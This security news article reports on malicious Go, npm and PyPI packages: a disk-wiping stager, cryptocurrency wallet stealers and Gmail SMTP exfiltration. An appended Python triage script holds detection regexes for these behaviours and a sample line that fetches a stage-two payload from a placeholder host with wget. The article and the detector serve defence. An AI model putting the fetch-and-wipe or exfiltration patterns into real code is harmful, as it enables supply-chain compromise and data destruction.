
Cybersecurity researchers have discovered three malicious Go modules containing obfuscated code that fetches a next-stage payload capable of irreversibly overwriting the primary disk of a Linux system and rendering it unbootable.
The names of the packages are listed below –
github[.]com/truthfulpharm/prototransform
github[.]com/blankloggia/go-mcp
github[.]com/Steelpoor/tlsproxy
“Even though they looked legal, these modules contained highly obfuscated code designed to retrieve and run remote payloads,” said Socket researcher Kush Pandya.
The packages are designed to check whether the host operating system is Linux and, if so, use wget to retrieve the next-stage payload from a remote server.
The payload is a destructive shell script that overwrites the entire primary disk (“/dev/sda”) with zeros, effectively preventing the machine from booting.
“This destructive method ensures that data recovery tools and forensic processes cannot recover data, as it is directly and irreversibly overwritten,” Pandya said.

“This malicious script highlights the extreme dangers posed by modern supply chain attacks that can completely cripple targeted Linux servers or developer environments and turn seemingly reliable code into a catastrophic threat.”
The disclosure comes as multiple malicious npm packages have been identified in the registry with the ability to steal sensitive data such as mnemonic seed phrases and private cryptocurrency keys and exfiltrate it. The packages identified by Socket, Sonatype, and Fortinet are listed below –
crypto-encrypt-ts
react-native-scrollpageviewtest
Bankingbundleserv
buttonfactoryserv-paypal
compliancereadsereadserserpal-paypal
payapal
payapal
payanpaypal
userbridge-paypal
userrelationship-paypal-paypal
Malware-laced packages targeting cryptocurrency wallets have also been discovered in the Python Package Index (PyPI) repository (Web3x and hereWalletbot). These packages have been downloaded over 6,800 times collectively since their release in 2024.
A further set of seven PyPI packages has also been found to use Gmail’s SMTP server and WebSockets for data exfiltration and remote command execution while evading detection. The packages, since removed, are –
CFC-BSB (2,913 downloads)
coffin2022 (6,571 downloads)
coffin-codes-2022 (18,126 downloads)
coffin-codes-net (6,144 downloads)
coffin-codes-net2 (6,238 downloads)
coffin-codes-pro (9,012 downloads)
coffin-grave (6,544 downloads)
The packages sign in to Gmail’s SMTP server using hardcoded Gmail account credentials and send a message to a second Gmail address to signal a successful compromise. They then open a WebSocket connection to establish a bidirectional communication channel with the attacker.

Threat actors are abusing the trust associated with Gmail domains (“smtp.gmail[.]com”) and the fact that corporate proxies and endpoint protection systems are unlikely to flag such traffic as suspicious, making the channel both stealthy and reliable.
The exception is CFC-BSB, which lacks the Gmail-related functionality but includes built-in WebSocket logic that facilitates remote access.
To mitigate the risk posed by such supply chain threats, developers are encouraged to verify the legitimacy of packages by checking publisher history and GitHub repository links, audit dependencies periodically, and enforce strict access controls for private keys.
“Beware of extraordinary outbound connections, especially SMTP traffic, as attackers can use legitimate services like Gmail to steal sensitive data,” said Olivia Brown, a Socket researcher. “Don’t trust a package just because it has been around for more than a few years without being taken down.”
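As an added example (not code from the article or from Socket), the following Python triage script turns the behaviours described above into a dependency-audit check: it scans vendored source for the pairing of an OS check with a remote fetch, references to raw disk devices, and hardcoded Gmail SMTP logins or WebSocket channels. The indicator regexes, verdict names and sample inputs are constructed for illustration and are heuristic only.

```python
"""Static triage for vendored dependency source trees (added example, heuristic)."""
import re
from pathlib import Path

# Indicator regexes, constructed from the behaviours the article describes.
INDICATORS = {
    "linux_check":  re.compile(r'runtime\.GOOS\s*==\s*"linux"|platform\.system\(\)|sys\.platform'),
    "remote_fetch": re.compile(r'\b(wget|curl)\b[^\n]*https?://'),
    "disk_wipe":    re.compile(r'/dev/sd[a-z]\b|/dev/nvme\d'),
    "gmail_smtp":   re.compile(r'smtp\.gmail\.com'),
    "smtp_login":   re.compile(r'smtplib\.SMTP(_SSL)?\(|\.login\('),
    "websocket":    re.compile(r'websocket', re.IGNORECASE),
}

# Verdicts are combinations: an OS check alone is normal build logic,
# an OS check next to a remote fetch is the stager pattern. The WebSocket
# rule is weak on its own (CFC-BSB had no Gmail logic) and needs manual review.
VERDICTS = [
    ("destructive-stager", {"linux_check", "remote_fetch"}),
    ("raw-disk-access",    {"disk_wipe"}),
    ("gmail-smtp-beacon",  {"gmail_smtp", "smtp_login"}),
    ("websocket-channel",  {"websocket"}),
]


def indicators_in(text: str) -> set:
    """Return the names of all indicators matched in a source file's text."""
    return {name for name, rx in INDICATORS.items() if rx.search(text)}


def verdicts_for(text: str) -> list:
    """Return the verdict labels whose full indicator set is present."""
    hits = indicators_in(text)
    return [label for label, needed in VERDICTS if needed <= hits]


def scan_tree(root: Path, suffixes=(".go", ".py", ".js", ".ts", ".sh")) -> dict:
    """Map each flagged file under root to its verdicts; clean files are omitted."""
    report = {}
    for path in sorted(root.rglob("*")):
        if path.is_file() and path.suffix in suffixes:
            found = verdicts_for(path.read_text(errors="replace"))
            if found:
                report[str(path.relative_to(root))] = found
    return report


# Constructed samples (placeholder URL/credentials, not real package code).
STAGER_LIKE = 'if runtime.GOOS == "linux" {\n\t// wget -q -O- http://placeholder.invalid/stage2\n}\n'
BENIGN_GO = 'if runtime.GOOS == "linux" {\n\tfmt.Println("linux build")\n}\n'
SMTP_BEACON_LIKE = 'server = smtplib.SMTP("smtp.gmail.com", 587)\nserver.login(USER, PASSWORD)\n'

if __name__ == "__main__":
    for name, sample in [("stager", STAGER_LIKE), ("benign", BENIGN_GO), ("smtp", SMTP_BEACON_LIKE)]:
        print(name, verdicts_for(sample))
```

Run `scan_tree(Path("vendor"))` (or a `go mod vendor` / `pip download` directory) to get a per-file report to review by hand; a hit is a prompt for inspection, not proof of malice.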